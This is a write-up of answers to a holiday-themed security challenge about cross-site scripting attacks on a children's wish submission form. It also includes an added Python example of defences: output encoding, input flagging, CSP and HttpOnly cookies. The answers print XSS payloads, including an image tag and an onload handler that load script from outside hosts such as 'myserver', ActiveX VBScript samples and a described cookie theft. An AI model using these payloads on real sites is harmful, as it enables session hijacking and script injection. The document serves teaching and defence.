By Ron Sweeney
1. What is the purpose of the first malicious wish text, and how does it work?
The purpose of the first text was to test whether the child could embed javascript into the wish form and reference a site outside of the submission server ("bumblesnowmonster.com").
For example, if the child put:
<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>
The analyst elf would see "nothing" or a broken image embedded in the submission. Typically you can use a transparent 1 x 1 image to accommodate this task.
You could also tail the log of "bumblesnowmonster.com", bounce it off a rogue mail script, or set up nc -l -p 80 to see exactly when, and with what, the "wish" was reviewed. It could then easily be used to embed javascript like the tag below (IE6), which refers to a script on the evil child's server (you could, I suppose, embed the whole javascript if there are no controls in place to block <script> tags):
<img src='http://www.bumblesnowmonster.com/clear.gif' onload='document.scripts(0).src="http://myserver/eviljavascript.js"'>
This would point the page's first script element at the evil script, making the analyst's browser load and execute it. The script here could be something like:
<SCRIPT LANGUAGE=VBScript>
Set WWObj = CreateObject("Word.Document")
WWObj.SaveAs("c:\resume.doc")
</SCRIPT>
or
document.write("I just ate 37 bytes on your hard drive")
or
<script LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</SCRIPT>
which makes for a great coffee holder!
2. What is the purpose of the second malicious wish text, and how does it work?
The second wish actually embeds the elves' cookie as an argument to a script on "http://myserver"; from there it can be "dug out" of the server requests on "myserver", so the evil children can access the same list as the analysts. Probably write a cool script called naughty2nice.pl and post it to BUGTRAQ too.
3. How could Hermey and Rudolph thwart the first and second types of attacks by altering the
Web application? Alternatively, how could they stop these attacks by changing the configuration of the
analyst elves' browsers?
You can lock down the web application by filtering the submitted text to prevent cross-site scripting, or by ignoring certain input types in the text box on the front end of the submissions.
You can lock down the browsers by setting them to disable or prompt for "access data sources across domains", or by using the high security setting for javascript.
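An added example (not part of Ron Sweeney's answer or the challenge) of the web-application changes question 3 asks about, in Python: output-encode each wish before the analyst elves' review page shows it, flag submissions that carry markup or reference a host other than the submission server, and send headers that keep the elves' cookie away from script. The submission host name, the cookie name and the sample wishes are constructed.

```python
import html
import re
from urllib.parse import urlparse

# Host of the wish submission server itself (hypothetical name); any other host
# referenced from a wish is an outside site, like bumblesnowmonster.com above.
SUBMISSION_HOST = "wishes.northpole.example"

# Constructed sample wishes, modelled on the two malicious texts discussed above.
WISHES = [
    "A red bicycle and a puppy, please.",
    '<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>',
    "<img src='http://www.bumblesnowmonster.com/clear.gif' "
    "onload='document.scripts(0).src=\"http://myserver/eviljavascript.js\"'>",
]

TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z!]")          # start of any tag or comment
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)  # absolute URLs in the text

def render_wish(wish: str) -> str:
    """Output-encode a wish for the analyst elves' review page: < > & " ' become
    entities, so an embedded IMG or SCRIPT tag is displayed as text, never run."""
    return html.escape(wish, quote=True)

def flag_wish(wish: str) -> list[str]:
    """Reasons to quarantine a wish before an elf opens it: any markup at all,
    and any URL that points somewhere other than the submission server."""
    findings = []
    if TAG_RE.search(wish):
        findings.append("markup")
    for url in URL_RE.findall(wish):
        host = urlparse(url).hostname
        if host != SUBMISSION_HOST:
            findings.append(f"external-ref:{host}")
    return findings

def review_page_headers(session_id: str) -> dict[str, str]:
    """Defence in depth for the review page: the browser fetches no script or
    image from another origin even if escaping is bypassed, and the session
    cookie (constructed name) is invisible to script, so it cannot be leaked."""
    return {
        "Content-Security-Policy": "default-src 'self'; object-src 'none'",
        "Set-Cookie": f"elfsession={session_id}; HttpOnly; Secure; SameSite=Strict",
    }

if __name__ == "__main__":
    for wish in WISHES:
        print(flag_wish(wish) or "clean", "->", render_wish(wish))
```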
4. Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different
methods for defeating such attacks by altering an e-mail reader's configuration?
Turn off HTML, or HTML with "preview" functionality, in the mail reader. Also, some operating systems share the same security mechanism across mail readers and internet applications; in either case you can disable or prompt for "access data sources across domains" in the same manner.